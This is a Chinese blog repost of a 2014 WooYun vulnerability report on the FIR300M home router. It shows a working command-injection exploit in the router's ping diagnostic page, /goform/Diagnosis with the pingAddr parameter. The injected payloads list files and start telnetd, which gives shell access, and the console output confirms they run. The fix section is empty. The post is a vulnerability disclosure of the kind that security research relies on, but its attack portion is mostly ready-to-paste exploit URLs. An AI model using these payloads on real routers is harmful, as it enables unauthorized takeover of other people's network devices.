记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

FIR300M依旧存在执行任意命令漏洞

2014-11-04 16:10

前几天看FIR300M才19.9! 果断买来爽一爽, 发现之前发现的system_command没了, 于是试着其他的办法

http://192.168.1.1/goform/Diagnosis?pingAddr=|echo ""|ls



发现过程:

连ttl,发现输出是这样的

试着提交一下

http://192.168.1.1/goform/Diagnosis?pingAddr=192.168.1.100

输出

ping -c 4 -s 64 -W 3 192.168.1.100 > /tmp/diagnosis





Web user Login:User:admin Mac:00:21:6b:13:6e:ac

login wizard.

ping -c 4 -s 64 -W 3 |echo ""|ls > /tmp/diagnosis

BusyBox v1.12.1 (2014-04-11 13:39:13 CST) multi-call binary



Usage: ping [OPTION]... host



果断

http://192.168.1.1/goform/Diagnosis?pingAddr=192.168.1.100|echo""|telnetd



可以连了.

漏洞证明:

Screenshot - 2014年09月20日 - 14时56分10秒.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-076729

阅读:108089 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“FIR300M依旧存在执行任意命令漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云